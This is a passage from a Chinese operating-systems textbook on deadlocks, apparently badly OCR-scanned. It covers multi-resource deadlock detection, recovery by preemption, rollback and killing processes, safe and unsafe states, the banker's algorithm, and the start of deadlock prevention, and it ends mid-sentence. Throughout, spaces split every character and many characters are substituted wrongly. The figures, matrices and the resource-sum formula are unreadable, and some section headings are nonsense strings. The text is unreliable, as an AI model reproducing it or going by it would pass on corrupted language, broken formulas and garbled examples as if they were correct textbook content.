6.4.2 ”每 种 类 型 多 个 资源 的 死 锁 检测 


如 果 有 多 种 相同 的 资源 存在 ， 就 需要 采用 另 一 种 方法 来 检测 死 锁 。 
现在 我 们 提供 一 种 基于 算 阵 的 算法 来 检测 从 P1 到 P, 这 n 个 进程 中 的 死 
锁 。 假 设 资源 的 类 型 数 为 m，Ei 代表 资源 类 型 1，E, 代表 资源 类 型 2，Ei 
代表 资源 类 型 i(1<izm)。F 是 现 有 资源 向 量 (existing resource vector) ， 
代表 每 种 已 存在 的 资源 总 数 。 比 如 ， 如 果 资 源 类 型 1 代表 磁带 机 ， 那 么 
E, -2 就 表示 系统 有 两 台 磁 带 机 。 





在 任意 时 刻 ， 某 些 资源 已 被 分 配 所 以 不 可 用 。 假 设 A 是 可 用 资源 向 
量 (available resource vector) , JKA A; 表示 当前 可 供 使 用 的 资源 数 〈 即 
没有 被 分 配 的 资源 ) 。 如 果 仅 有 的 两 台 磁 带 机 都 已 经 分 配 出 去 了 ， 那 么 
A, 的 值 为 0。 





现在 我 们 需要 两 个 数组 :，C 代 表 当 前 分 配 和 矩阵 (current allocation 
matrix) ，R 代 表 请 求 和 矩阵 (request matrix) 。C 的 第 i 行 代表 Pi; 当前 所 持 
有 的 每 一 种 类 型 资源 的 资源 数 。 所 以 ，Ci 代表 进程 i 所持 有 的 资源 j 的 数 
。 同 理 ，Ri 代表 Pi 所 需要 的 资源 j 的 数量 。 这 四 种 数据 结构 如 图 6-6 所 
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现 有 资源 可 用 资源 


(EB E}, EF) (A,, A>, Az, ***, Ay) 
“A ad Fic BE BE WRK HE ME 
G G 6 p. Be Rr $% R, 
Do & & a & BR. Re Re R 
‘Gun E- A Ro Be Re Ra 
第 n 行 是 进程 n 当 前 已 分 配 到 的 资源 第 2 行 是 进程 2 需要 的 资源 


图 6-6 死 锁 检测 算法 所 需 的 四 种 数据 结构 


这 四 种 数据 结构 之 间 有 一 个 重要 的 和 恒等式。 具体 地 说 ， 茶 种 资源 要 


么 已 分 配 要 么 可 用 。 这 个 结论 意味 着 : 





DG+4 =F; 
i=1 


换言之 ， 如 果 我 们 将 所 有 已 分 配 的 资源 j 的 数量 加 起 来 再 和 所 有 可 
供 使 用 的 资源 数 相 加 ， 结 果 就 是 该 类 资源 的 资源 总 数 。 











死 锁 检测 算法 就 是 基于 向 量 的 比较 。 我 们 定义 向 量 A 和 向 量 B 之 间 
的 关系 为 A<B 以 表明 A 的 每 一 个 分 量 要 么 等 于 要 么 小 于 和 B 向 量 相 对 应 
的 分 量 。 从 数学 上 来 说 ，A<B 当 且 仅 当 且 A; <B; (0<i<m)。 


每 个 进程 起 初 都 是 没有 标记 过 的 。 算 法 开始 会 对 进程 做 标记 ， 进 程 
被 标记 后 束 表 明 它 们 能 够 被 执行 ， 不 会 进入 死 锁 。 当 算法 结束 时 ， 任 何 








没有 标记 的 进程 都 是 死 锁 进 程 。 该 算法 假定 了 一 个 最 坏 情 形 : 所 有 的 进 
程 在 退出 以 前 都 会 不 停 地 获取 资源 。 


和 死 锁 检测 算法 如 下 : 


1]) 寻 找 一 个 没有 标记 的 进程 P ， 对 于 它 而 言 R 和 矩阵 的 第 i 行 癌 量 小 于 


2) 如 宋 找 到 了 这 样 一 个 进程 ， 那 么 将 C 窍 阵 的 第 i 行 癌 量 加 到 A 中 ， 
标记 该 进程 ， 并 转 到 第 1 步 。 


3) 如 果 没 有 这 样 的 进程 ， 那 么 算法 终止 。 


算法 结束 时 ， 所 有 没有 标记 过 的 进程 (如 果 存 在 的 话 ) 都 是 死 锁 进 








算法 的 第 1 步 是 寻找 可 以 运行 完毕 的 进程 ， 该 进程 的 特点 是 它 有 资 
源 请 求 并 且 该 请 求 可 航 当 前 的 可 用 资源 满足 。 这 一 选中 的 进程 随后 就 家 
运行 完毕 ， 在 这 段 时 间 内 它 释 放 自 己 持 有 的 所 有 资源 并 将 它们 返回 到 可 
用 资源 库 中 。 然 后 ， 这 一 进程 被 标记 为 完成 。 如 果 所 有 的 进程 最 终 都 能 
行 完 毕 的 话 ， 就 不 存在 死 锁 的 情况 。 如 果 其 中 人 系 些 进程 一 直 不 能 运 
行 ， 那 么 它们 就 是 死 锁 进程 。 虽 然 算法 的 运行 过 程 是 不 确定 的 (因为 进 
程 可 按 任 何 行 得 遂 的 次 序 执行 )， 但 结果 总 是 相同 的 。 











ni 





作为 一 个 例子 ， 在 图 6-7 中 展示 了 用 该 算法 检测 死 锁 的 工作 过 程 。 


这 里 我 们 有 3 个 进程 、4 种 资源 (可 以 任意 地 将 它们 标记 为 磁带 机 、 绘 图 
仪 、 扫 描 仪 和 CD-ROM 了 驱动 器 ) 。 进 程 1L 有 一 台 扫 描 仪 。 进 程 2 有 2 人 台 磁 
带 机 和 1 个 CD-ROM 驱 动 器 。 进 程 3 有 1 个 绘图 仪 和 2 台 扫 描 仪 。 每 一 个 进 
程 都 需要 额外 的 资源 ， 如 矩阵 R 所 示 。 


要 运行 死 锁 检测 算法 ， 首 先 找 出 哪 一 个 进程 的 资源 请 求 可 被 满足 。 
第 1 个 不 能 被 满足 ， 因 为 没有 CD-ROM 了 驱动 器 可 供 使 用 。 第 2 个 也 不 能 被 
满足 ， 由 于 没有 打印 机 空 站。 幸运 的 是 ， 第 3 个 可 被 满足 ， 所 以 进程 3 运 
行 并 最 终 释 放 它 所 拥有 的 资源 ， 给 出 





A=(2 2 2 0) 





接 下 来 ， 进 程 2 也 可 运行 并 释放 它 所 拥有 的 资源 ， 给 出 


A=(422 1) 


现在 剩 下 的 进程 都 能 够 运行 ， 所 以 这 个 系统 中 不 存在 死 锁 。 


假设 图 6-7 的 情况 有 所 改变 。 进 程 2 需 要 1 个 CD-ROM 驱 动 器 、2 台 磁 
市 机 和 1 台 绘 图 仪 。 在 这 种 情况 下 ， 所 有 的 请 求 都 不 能 得 到 满足 ， 整 个 
系统 进入 死 锁 。 
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图 6-7 死 锁 检 测算 法 的 一 个 例子 


现在 我 们 知道 了 如 何 检 测 死 锁 (至 少 是 在 这 种 预先 知道 静态 资源 请 
求 的 情况 下 ) ， 但 问题 在 于 何 时 去 检测 它们 。 一 种 方法 是 每 当 有 资源 请 
求 时 去 检测 。 毫 无 疑问 越 早 发 现 越 好 ， 但 这 种 方法 会 占用 昂贵 的 CPU 时 
间 。 另 一 种 方法 是 每 隔 k 分 钟 检测 一 次 ， 或 者 当 CPU 的 使 用 率 降 到 某 一 
域 值 时 去 检测 。 考 虑 到 CPU 使 用 效率 的 原因 ， 如 果 死 锁 进 程 数 达 到 一 定 
数量 ， 就 没有 多 少 进程 可 运行 了 ， 所 以 CPU 会 经 常 空闲 。 
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么 办 ? 当然 需要 一 些 方法 使 系统 重新 正常 工作 。 在 本 小 节 中 ， 我 们 会 
论 各 种 从 死 锁 中 恢复 的 方法 ， 尽 管 这 些 方法 看 起 来 都 不 那么 令 人 满意 


1. 利 用 抢占 恢复 


在 某 些 情况 下 ， 可 能 会 临时 将 某 个 资源 从 它 的 当前 所 有 者 那里 转移 
到 另 一 个 进程 。 许 多 情况 下 ， 尤 其 是 对 运行 在 大 型 主机 上 的 批 处 理 操作 
系统 来 说 ， 需 要 人 工 进行 干预 。 





比如 ， 要 将 激光 打印 机 从 它 的 持 有 进程 那里 拿 走 ， 管 理 员 可 以 收集 
已 打印 好 的 文档 并 将 其 堆积 在 一 旁 。 然 后 ， 该 进程 被 挂 起 (标记 为 不 可 
运行 ) 。 接 着 ， 打 印 机 被 分 配给 另 一 个 进程 。 当 那个 进程 结束 后 ， 堆 在 
一 旁 的 文档 再 被 重新 放 回 原 处 ， 原 进程 可 重新 继续 工作 。 





在 不 通知 原 进程 的 情况 下 ， 将 杂 一 资源 从 一 个 进程 强行 取 走 给 为 一 
个 进程 使 用 ， 接 着 又 送 回 ， 这 种 做 法 是 否 可 行 主要 取决 于 该 资源 本 身 的 
特性 。 用 这 种 方法 恢复 通 第 比较 困难 或 者 说 不 太 可 能 。 厦 选择 挂 起 某 个 
进程 ， 则 在 很 大 程度 上 取决 于 哪 一 个 进程 拥有 比较 容易 收回 的 资源 。 











2. 利 用 回 深 恢 复 


如 末 系 统 设计 人 员 以 及 主机 操作 员 了 解 到 死 锁 有 可 能 发生 ， 他 们 束 
可 以 周期 性 地 对 进程 进行 检查 点 检查 Ccheckpointed) 。 进 程 检查 点 检 
查 束 是 将 进程 的 状态 写 入 一 个 文件 以 备 以 后 重 局 。 该 检查 点 中 不 仅 包括 
存储 映像 ， 还 包括 了 资源 状态 ， 即 哪些 资源 分 配给 了 该 进程 。 为 了 使 这 
一 过 程 更 有 效 ， 新 的 检查 扣 不 应 窗 盖 原 有 的 文件 ， 而 应 写 到 新 文件 中 。 
这 样 ， 当 进程 执行 时 ， 将 会 有 一 系列 的 检查 点 文件 被 累积 起 来 。 











一 旦 检测 到 死 锁 ， 就 很 容易 发 现 需 要 哪些 资源 。 为 了 进行 恢复 ， 要 
从 一 个 较 早 的 检查 点 上 开始 ， 这 样 拥有 所 需要 资源 的 进程 会 回 滚 到 一 个 
时 间 点 ， 在 此 时 间 点 之 前 该 进程 获得 了 一 些 其 他 的 资源 。 在 该 检查 点 后 
所 做 的 所 有 工作 都 丢失 。《【 例 如 ， 检 查 点 之 后 的 输出 必须 丢弃 ， 因 为 它 
们 还 会 被 重新 输出 。) 实际 上 ， 是 将 该 进程 复位 到 一 个 更 早 的 状态 ， 那 
时 它 还 没有 取得 所 需 的 资源 ， 接 着 就 把 这 个 资源 分 配给 一 个 死 锁 进程 。 
如 果 复 位 后 的 进程 试图 重新 获得 对 该 资源 的 控制 ， 它 就 必须 一 直 等 到 该 
资源 可 用 时 为 止 。 











最 直接 也 是 最 简单 的 解决 死 锁 的 方法 是 杀 死 一 个 或 右 干 个 进程 。 一 
种 方法 是 杀 掉 环 中 的 一 个 进程 。 如 有 果 走 运 的 话 ， 其 他 进程 将 可 以 继续 。 
如 果 这 样 做 行 不 通 的 话 ， 就 需要 继续 杀 死 别 的 进程 直到 打破 死 锁 环 。 


另 一 种 方法 是 选 一 个 环 外 的 进程 作为 牺牲 品 以 释放 该 进程 的 资源 。 


在 使 用 这 种 方法 时 ， 选 择 一 个 要 被 杀 死 的 进程 要 特别 小 心 ， 它 应 该 正好 
持 有 环 中 某 些 进程 所 需 的 资源 。 比 如 ， 一 个 进程 可 能 持 有 一 台 绘 图 仪 而 
再 要 一 全 打印 机 ， 而 另 一 个 进程 可 能 持 有 一 台 打 印 机 而 需要 一 合 绘图 
仪 ， 因 而 这 两 个 进程 是 死 锁 的 。 第 三 个 进程 可 能 持 有 男 一 台 同 样 的 打印 
机 和 男 一 台 同 样 的 绘图 仪 而 且 正 在 运行 着 。 儿 死 第 三 个 进程 将 释放 这 些 
资源 ， 从 而 打破 前 两 个 进程 的 死 锁 。 











有 可 能 的 话 ， 最 好 杀 和 死 可 以 从 头 开 始 重新 运行 而 且 不 会 带 来 副作用 
的 进程 。 比 如 ， 编 译 进程 可 以 被 重复 运行 ， 由 于 它 只 需要 读 入 一 个 源 文 
件 和 产生 一 个 目标 文件 。 如 果 将 它 中 途 杀 死 ， 它 的 第 一 次 运行 不 会 影响 


一 
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到 第 二 次 运行 








男 一 方面 ， 更 新 数据 库 的 进程 在 第 二 次 运行 时 并 非 总 是 安全 的 。 如 
果 一 个 进程 将 数据 库 的 某 个 记录 加 1， 那 么 运行 它 一 次 ， 将 它 杀 死 后 ， 
再 次 执行 ， 就 会 对 该 记录 加 2， 这 显然 是 错误 的 。 











6.5 JEBANE Ha 


在 讨论 死 锁 检测 时 ， 我 们 假设 当 一 个 进程 请 求 资 源 时 ， 它 一 次 就 请 
求 所 有 的 资源 〈 见 图 6-6 中 的 和 矩阵 R) 。 不 过 在 大 多 数 系统 中 ， 一 次 只 请 
求 一 个 资源 。 系 统 必 须 能 够 判断 分 配 资源 是 否 安全 ， 并 且 只 能 在 保证 安 
全 的 条 件 下 分 配 资 源 。 问 题 是 : 是 否 存在 一 种 算法 总 能 做 出 正确 的 选择 
从 而 避免 死 锁 ? 答案 是 衣 定 的 ， 但 条 件 是 必须 事先 获得 一 些 特定 的 信 
恩 。 本 节 我 们 会 讨论 几 种 死 锁 避免 的 方法 。 











6.5.1 资源 轨迹 图 





避免 死 锁 的 主要 算法 是 基于 一 个 安全 状态 的 概念 。 在 描述 算法 前 ， 
我 们 先 讨 论 有 关 安 全 的 概念 。 通 过 图 的 方式 ， 能 更 容易 理解 。 虽 然 图 的 
方式 不 能 被 直接 翻译 成 有 用 的 算法 ， 但 它 给 出 了 一 个 解决 问题 的 直观 感 


SE o 


在 图 6-8 中 ， 我 们 看 到 一 个 处 理 两 个 进程 和 两 种 资源 (打印 机 和 绘 
图 仪 ) 的 模型 。 横 轴 表 示 进 程 A 执 行 的 指令 ， 纵 轴 表 示 进 程 B 执 行 的 指 
S. HAEL 处 请 求 一 台 打 印 机 ， 在 Ia 处 释放 ， 在 I 处 请 求 一 台 绘 图 
IX, TEL, 处 释放 。 进 程 B 在 I; 到 LI 之 间 需 要 绘图 仪 ， 在 I6 到 Ia 之 间 需 要 
打印 机 。 


eu (两 个 进程 都 
完成 ) 


打印 机 


| 


绘图 仪 











打印 机 一 一 一 一 一 > 





— 绘图 仪 
图 6-8 两 个 进程 的 资源 轨迹 图 
图 6-8 中 的 每 一 点 都 表示 出 两 个 进程 的 连接 状态 。 初 始点 为 p， 没 有 
进程 执行 任何 指令 。 如 果 调 度 程序 选中 A 先 运行 ， 那 
令 后 到 达 q， 此 时 B 没 有 执行 任何 指令 


么 在 A 执 行 一 段 指 
。 在 qd 点 ， 如 果 轨 迹 沿 垂直 方 同 移 
动 ， 表 示 调 度 程 序 选 中 B 运 行 。 在 单 处 理 机 情况 下 ， 所 有 路 径 都 只 能 是 


水 平 或 垂直 方向 的 ， 不 会 出 现 锋 问 的。 因此， 运动 方 同一 定 是 向上 或 癌 
右 ， 不 会 癌 左 或 网 下 ， 因 为 进程 的 执行 不 可 能 后 退 。 











当 进 程 A 由 r 癌 s 移 动 穿 过 11 线 时 ， 它 请 求 并 获得 打印 机 。 当 进程 B 到 
达 t 时 ， 它 请 求 绘图 仪 。 


图 中 的 阴影 部 分 是 我 们 感 兴趣 的 ， 画 着 从 左下 到 右上 和 斜 线 的 部 分 表 


示 在 该 区 域 中 两 个 进程 都 拥有 打印 机 ， 而 互 斥 使 用 的 规则 决定 了 不 可 能 
进入 该 区 域 。 男 一 种 斜 线 的 区 域 表示 两 个 进程 都 拥有 绘图 仪 ， 且 同样 不 
可 进入 。 


如 果 系 统一 旦 进入 由 I 、L Fle. 1, 组 成 的 矩形 区 域 ， 那 么 最 后 一 
ERRAL 和 16 的 交叉 点 ， 这 时 就 产生 死 锁 。 在 该 点 处 ，A 请 求 绘图 
仪 ，B 请 求 打印 机 ， 而 且 这 两 种 资源 均 已 被 分 配 。 这 整个 矩形 区 域 都 是 
不 安全 的 ， 因 此 决 不 能 进入 这 个 区 域 。 在 点 t 处 惟一 的 办 法 是 运行 进程 A 
直到 I ， 过 了 1 后 ， 可 以 按 任何 路 线 前 进 ， 直 到 终点 u。 


需要 注意 的 是 ， 在 点 t 进 程 B 请 求 资源 。 系 统 必须 决定 是 否 分 配 。 如 
果 系 统 把 资源 分 配给 B， 系 统 进入 不 安全 区 域 ， 最 终 形 成 死 锁 。 要 避免 
死 锁 ， 应 该 将 B 挂 起 ， 直 到 A 请 求 并 释放 绘图 仪 。 


6.5.2 ”安全 状态 和 不 安全 状态 





我 们 将 要 研究 的 死 锁 避免 算法 使 用 了 图 6-6 中 的 有 关 信 息 。 在 任何 
时 刻 ， 当 前 状态 包括 了 E、A、C 和 R。 如 果 没 有 死 锁 发 和 后， 并 且 即 使 所 
有 进程 突然 请 求 对 资源 的 最 大 需求 ， 也 仍然 存在 某 种 调度 次 序 能 够 使 得 
每 一 个 进程 运行 完毕 ， 则 称 该 状态 是 安全 的 。 通 过 使 用 一 个 资源 的 例子 
很 容易 说 明 这 个 概念 。 在 图 6-9a 中 有 一 个 A 拥 有 3 个 资源 实例 但 最 终 可 能 
会 需要 9 个 资源 实例 的 状态 。B 当 前 拥有 2 个 资源 实例 ， 将 来 共 需 要 4 个 资 
源 实例 。 同 样 ，C 拥 有 2 个 资源 实例 ， 还 需要 另外 5 个 资源 实例 。 总 共有 
10 个 资源 实例 ， 其 中 有 7 个 资源 已 经 分 配 ， 还 有 3 个 资源 是 空闲 的 。 





CA 最 大 CA 最 大 CA 最 大 CA 最 大 CA 最 大 
数量 需求 数量 需求 数量 需求 数量 需求 数量 需求 





250: 1 FA: 5 251A: 0 25 A: 7 
a) b) c) d) e) 


图 6-9 说 明 a 中 的 状态 为 安全 状态 
图 6-9a 的 状态 是 安全 的 ， 这 是 由 于 存在 一 个 分 配 序列 使 得 所 有 的 进 
程 都 能 完成 。 也 就 是 说 ， 这 个 方案 可 以 单独 地 运行 B， 直 到 它 请 求 并 获 
得 另外 两 个 资源 实例 ， 从 而 到 达 图 6-9b 的 状态 。 当 B 完 成 后 ， 就 到 达 了 











图 6-9c 的 状态 。 然 后 调度 程序 可 以 运行 C， 再 到 达 图 6-9d 的 状态 。 当 C 完 
成 后 ， 到 达 了 图 6-9e 的 状态 。 现 在 A 可 以 获得 它 所 需要 的 6 个 资源 实例 ， 
并 且 完 成 。 这 样 系统 通过 仔细 的 调度 ， 惑 能 够 避免 死 锁 ， 所 以 图 6-9a 的 
状态 是 安全 的 。 








现在 假设 初始 状态 如 图 6-10a 所 示 。 但 这 次 A 请 求 并 得 到 另 一 个 资 
源 ， 如 图 6-10b 所 示 。 我 们 还 能 找到 一 个 序列 来 完成 所 有 工作 吗 ? 我 们 
来 试 一 试 。 调 度 程序 可 以 运行 B， 直 到 B 获 得 所 需 资 源 ， 如 图 6-10c 所 


ZN o 








最 终 ， 进 程 B 完 成 ， 状 态 如 图 6-10d 所 示 ， 此 时 进入 困境 了 。 只 有 4 
个 资源 实例 空 尊 ， 并 且 所 有 活动 进程 都 需要 5 个 资源 实例 。 任 何 分 配 资 
源 实例 的 序列 都 无 法 保证 工作 的 完成 。 于 是 ， 从 图 6-10a 到 图 6-10b 的 分 
配方 案 ， 从 安全 状态 进入 到 了 不 安全 状态 。 从 图 6-10c 的 状态 出 发 运行 
进程 A 或 C 也 都 不 行 。 回 过 头 来 再 看 ，A 的 请 求 不 应 该 满足 。 





值得 注意 的 是 ， 不 安全 状态 并 不 是 死 锁 。 从 图 6-10b 出 发 ， 系 统 能 
运行 一 段 时 间 。 实 际 上 ， 甚 全 有 一 个 进程 能 够 完成 。 而 且 ， 在 A 请 求 其 
他 资源 实例 前 ，A 可 能 移 释 放 一 个 资源 实例 ， 这 融 可 以 让 C 先 完成 ， 从 
而 避免 了 死 锁 。 因 而 ， 安 全 状态 和 不 安全 状态 的 区 别 是 : 从 安全 状态 出 
发 ， 系 统 能 够 保证 所 有 进程 都 能 完成 ， 而 从 不 安全 状态 出 用， 就 没有 这 
样 的 保证 。 
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图 6-10 


说 明 b 中 的 状态 为 不 安全 状态 


6.5.3 ”单个 资源 的 银行 家 算法 


Dijkstra (1965) 提出 了 一 种 能 够 避免 死 锁 的 调度 算法 ， 称 为 银行 
家 算法 (banker's algorithm) ， 这 是 6.4.1 节 中 给 出 的 死 锁 检 测算 法 的 扩 
展 。 该 模型 基于 一 个 小 城镇 的 银行 家 ， 他 向 一 群 客户 分 别 承诺 了 一 定 的 
贷款 额度 。 算 法 要 做 的 是 判断 对 请 求 的 满足 是 否 会 导致 进入 不 安全 状 
态 。 如 果 是 ， 就 拒绝 请 求 ， 如 果 满 足 请 求 后 系统 仍然 是 安全 的 ， 就 予以 
分 配 。 在 图 6-11a 中 我 们 看 到 4 个 客户 A、B、C、D， 每 个 客户 都 被 授予 
一 定数 量 的 贷款 单位 〈 比 如 1 单位 是 1 千 美 元 ) ， 银 行家 知道 不 可 能 所 有 
客户 同时 都 需要 最 大 贷款 额 ， 所 以 他 只 保留 10 个 单位 而 不 是 22 个 单位 的 
资金 来 为 客户 服务 。 这 里 将 客户 比 作 进程 ， 贷 款 单 位 比 作 资 源 ， 银 行家 
比 作 操作 系统 。 


已 有 最 大 CA 最 大 
数量 需求 数量 需求 





空闲 : 10 
a) 





A 6-11 


客户 们 各 自 做 自己 的 生意 ， 在 人 条 些 时 刻 需 要 贷款 (相当 于 请 求 资 
Vid 。 在 某 一 时 刻 ， 具 体 情 况 如 图 6-11b 所 示 。 这 个 状态 是 安全 的 ， 由 
于 保留 着 2 个 单位 ， 银 行家 能 够 拖延 除了 C 以 外 的 其 他 请 求 。 因 而 可 以 让 
C 先 完成 ， 然 后 释放 C 所 占 的 4 个 单位 资源 。 有 了 这 4 个 单位 资源 ， 银 行 
家 就 可 以 给 D 或 B 分 配 所 需 的 贷款 单位 ， 以 此 类 推 。 





考虑 假如 癌 B 提 供 了 另 一 个 他 所 请 求 的 贷款 单位 ， 如 图 6-11b 所 示 ， 
那么 我 们 就 有 如 图 6-11c 所 示 的 状态 ， 该 状态 是 不 安全 的 。 如 果 忽 然 所 
有 的 客户 都 请 求 最 大 的 限额 ， 而 银行 家 无 法 满足 其 中 任何 一 个 的 要 求 ， 
那么 就 会 产生 死 锁 。 不 安全 状态 并 不 一 定 引起 死 锁 ， 由 于 客户 不 一 定 需 
要 其 最 大 贷款 额度 ， 但 银行 家 不 敢 抱 这 种 侥幸 心理 。 

















银行 家 算法 就 是 对 每 一 个 请 求 进行 检查 ， 检 查 如 果 满 足 这 一 请 求 是 
个 会 达到 安全 状态 。 知 是 ， 那 么 就 满足 该 请 求 ; BA, ASA REE RTI 
一 请 求 的 满足 。 为 了 看 状态 是 否 安全 ， 银 行家 看 他 是 噩 有 足够 的 资源 满 
足 茶 一 个 客户 。 如 果 可 以 ， 那 么 这 笔 投 资 认 为 是 能 够 收回 的 ， 并 且 接 着 
检查 最 接近 最 大 限额 的 一 个 客户 ， 以 此 类 推 。 如 果 所 有 投资 最 终 部 被 收 
回 ， 那 么 该 状态 是 安全 的 ， 最 初 的 请 求 可 以 批准 。 





6.5.4 多 个 资源 的 银行 家 算法 


可 以 把 银行 家 算法 进行 推广 以 处 理 多 个 资源 。 图 6-12 说 明了 多 个 资 
源 的 银行 家 算法 如 何 工作 。 


在 图 6-12 中 我 们 看 到 两 个 矩阵 。 左 边 的 矩阵 显示 出 为 5 个 进程 分 别 
己 分 配 的 各 种 资源 数 ， 右 边 的 矩阵 显示 了 使 各 进程 完成 运行 所 需 的 各 种 
资源 数 。 这 些 和 矩阵 就 是 图 6-6 中 的 C 和 R。 和 一 个 资源 的 情况 一 样 ， 各 进 
程 在 执行 前 给 出 其 所 需 的 全 部 资源 量 ， 所 以 在 系统 的 每 一 步 中 都 可 以 计 
算出 右边 的 矩阵 。 
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已 分 配 资源 仍然 需要 的 资源 


图 6-12 多 个 资源 的 银行 家 算法 


图 6-12 最 右边 的 三 个 向 量 分 别 表示 现 有 资源 E、 已 分 配 资源 P 和 可 用 
资源 A。 由 E 可 知 系统 中 共有 6 台 人 磁带 机 、3 台 绘图 仪 、4 台 打印 机 和 2 人 台 
CD-ROM 驱 动 右 。 由 了 可知 当前 已 分 配 了 5 人 台 磁 带 机 、3 侣 绘图 仪 、2 台 打 
印 机 和 2 台 CD-ROM 驱 动 器 。 该 向 量 可 通过 将 左边 矩阵 的 各 列 相 加 获 
得 ， 可 用 资源 向 量 可 通过 从 现 有 资源 中 减 去 已 分 配 资源 获得 。 





检查 一 个 状态 是 人 否 安全 的 算法 如 下 : 


1) 查 找 右边 矩阵 中 是 否 有 一 行 ， 其 没有 说 满足 的 资源 数 均 小 于 或 等 
于 A。 如 果 不 存在 这 样 的 行 ， 那 么 系统 将 会 死 锁 ， 因 为 任何 进程 都 无 法 
运行 结束 《假定 进程 会 一 直 占 有 资源 直到 和 它们 终止 为 止 ) 。 








2) 假 大 找到 这 样 一 行 ， 那 么 可 以 假设 它 获 得 所 需 的 资源 并 运行 结 
束 ， 将 该 进程 标记 为 终止 ， 并 将 其 资源 加 a 到 向 量 A 上 。 

3) 重 复 以 上 两 步 ， 或 者 直到 所 有 的 进程 都 标记 为 终止 ， 其 初始 状态 
古 安 全 的 ;或 者 所 有 进程 的 资源 需求 都 得 不 到 满足 ， 此 时 就 是 发 生 了 和 死 
锁 。 

如 果 在 第 1 步 中 同时 有 知 干 进程 均 符 合 条 件 ， 那 么 不 管 挑选 哪 一 个 
运行 都 没有 关系 ， 因 为 可 用 资源 或 者 会 增多 ， 或 者 至 少 保持 不 变 。 


图 6-12 中 所 示 的 状态 是 安全 的 ， 知 进程 B 现 在 再 请 求 一 台 打 印 机 ， 
可 以 满足 它 的 请 求 ， 因 为 所 得 系统 状态 仍然 是 安全 的 (进程 D 可 以 结 





束 ， 然 后 是 A 或 上 结束 ， 剩 下 的 进程 相继 结束 ) 。 


假设 进程 B 获 得 两 台 可 用 打印 机 中 的 一 台 以 后 ，E 试 图 获得 最 后 一 
台 打 印 机 ， 假 知 分 配给 E， 可 用 资源 癌 量 会 减 到 (1000) ， 这 时 会 引起 
死 锁 。 显 然 E 的 请 求 不 能 立即 满足 ， 必 须 延 迟 一 段 时 间 。 


银行 家 算法 最 早 由 Dijkstra 于 1965 年 发 表 。 从 那 之 后 几乎 每 本 操作 
系统 的 专著 都 详细 地 描述 它 ， 很 多 论文 的 内 容 也 于 绕 该 算法 讨论 了 它 的 
不 同方 面 。 但 很 少 有 作者 指出 该 算法 虽然 很 有 意义 但 缺乏 实用 价值 ， 因 
为 很 少 有 进程 能 够 在 运行 前 就 知道 其 所 需 资 源 的 最 大 值 。 而 且 进程 数 也 
不 是 固定 的 ， 往 往 在 不 断 地 变化 〈 如 新 用 户 的 登录 或 退出 ) ， 况 且 原 本 
可 用 的 资源 也 可 能 突然 间 变 成 不 可 用 《如 磁带 机 可 能 会 坏 掉 ) 。 因 此 ， 
在 实际 中 ， 如 果 有 ， 也 只 有 极 少 的 系统 使 用 银行 家 算法 来 避免 死 锁 。 




















6.6” 死 锁 预 防 


通过 前 面 的 学 习 我 们 知道 ， 死 锁 避 免 从 本 质 上 来 说 是 不 可 能 的 ， 因 
为 它 需要 获知 未 来 的 请 求 ， 而 这 些 请 求 是 不 可 知 的 。 那 么 实际 的 系统 又 
是 如 何 避 免 死 锁 的 呢 ? 我 们 回顾 Coftman 等 人 〈1971) 所 述 的 四 个 条 
件 ， 看 是 否 能 发 现 线索 。 如 果 能 够 保证 四 个 条 件 中 至 少 有 一 个 不 成 立 ， 
那么 死 锁 将 不 会 产生 (Havender, 1968) 。 





6.6.1 破坏 互 斥 条 件 


先 考 虑 破坏 互 斥 使 用 条 件 。 如 宁 资 源 不 航 一 个 进程 所 独占 ， 那 么 死 
锁 肯 定 不 会 产生 。 当 然 ， 多 许 两 个 进程 同时 使 用 打印 机 会 造成 混乱 ， 通 
过 采用 假 脱 机 打印 机 (spooling printer) 技术 可 以 允许 若干 个 进程 同时 
产生 和 输出。 该 模型 中 惟一 真正 请 求 使 用 物理 打印 机 的 进程 是 打印 机 守护 
进程 ， 由 于 守护 进程 决 不 会 请 求 别 的 资源 ， 所 以 不 会 因 打印 机 而 产生 死 
锁 。 


假设 守护 进程 被 设计 为 在 所 有 输出 进入 假 脱 机 之 前 就 开始 打印 ， 那 
么 如 琳 一 个 输出 进程 在 头 一 轮 打印 之 后 决定 等 每 几 个 小 时 ， 打 印 机 就 可 
能 空置 。 为 了 避免 这 种 现象 ， 一 般 将 守护 进程 设计 成 在 完整 的 输出 文件 
就 绪 后 才 开 始 打印 。 例 如 ， 寿 两 个 进程 分 别 占 用 了 可 用 的 假 脱 机 磁盘 衬 


间 的 一 半 用 于 输出 ， 而 任何 一 个 也 没有 能 够 完成 输出 ， 那 么 会 怎样 ? 在 
这 种 情形 下 ， 残 会 有 两 个 进程 ， 其 中 每 一 个 都 完成 了 部 分 的 输出 ， 但 不 
古 它 们 的 全 部 输出 ， 于 是 无 法 继续 进行 下 去 。 没 有 一 个 进程 能 够 完成 ， 
结果 在 磁盘 上 出 现 了 死 锁 。 


不 过 ， 有 一 个 小 思路 是 经 第 可 适用 的 。 那 束 是 ， 避 免 分 配 那 些 不 是 
绝对 必需 的 资源 ， 尽 量 做 到 尽 可 能 少 的 进程 可 以 真正 请 求 资 源 。 


6.6.2 BONE ASE ATE 





Coffman 等 表述 的 第 二 个 条 件 似乎 更 有 希望 。 只 要 茶 止 已 持 有 资源 

的 进程 再 等 待 其 他 资源 便 可 以 消除 死 锁 。 一 种 实现 方法 是 规定 所 有 进程 

在 开始 执行 前 请 求 所 需 的 全 部 资源 。 如 果 所 需 的 全 部 资源 可 用 ， 那 么 就 

将 它们 分 配给 这 个 进程 ， 于 是 该 进程 肯定 能 够 运行 结束 。 如 果 有 一 个 或 
Age 


多 个 资源 正 被 使 用 ， 那 么 就 不 进行 分 配 ， 进 程 等 待 。 











这 种 方法 的 一 个 直接 问题 是 很 多 进程 直到 运行 时 才 知 道 它 需要 多 少 
资源 。 实 际 上 ， 如 果 进 程 能 够 知道 它 需 要 多 少 资源 ， 就 可 以 使 用 银行 家 
算法 。 男 一 个 问题 是 这 种 方法 的 资源 利用 率 不 是 最 优 的 。 例 如 ， 有 一 个 
进程 先 从 输入 磁带 上 读 取 数 据 ， 进 行 一 小 时 的 分 析 ， 最 后 会 写 到 输出 磁 
市 上 ， 同 时 会 在 绘图 仪 上 绘 出 。 如 果 所 有 资源 都 必须 提前 请 求 ， 这 个 进 
程 就 会 把 输出 磁带 机 和 绘图 仪 控制 住 一 小 时 。 








不 过 ， 一 些 大 型 机 批 处 理 系统 要 求 用 户 在 所 提交 的 作业 的 第 一 行列 
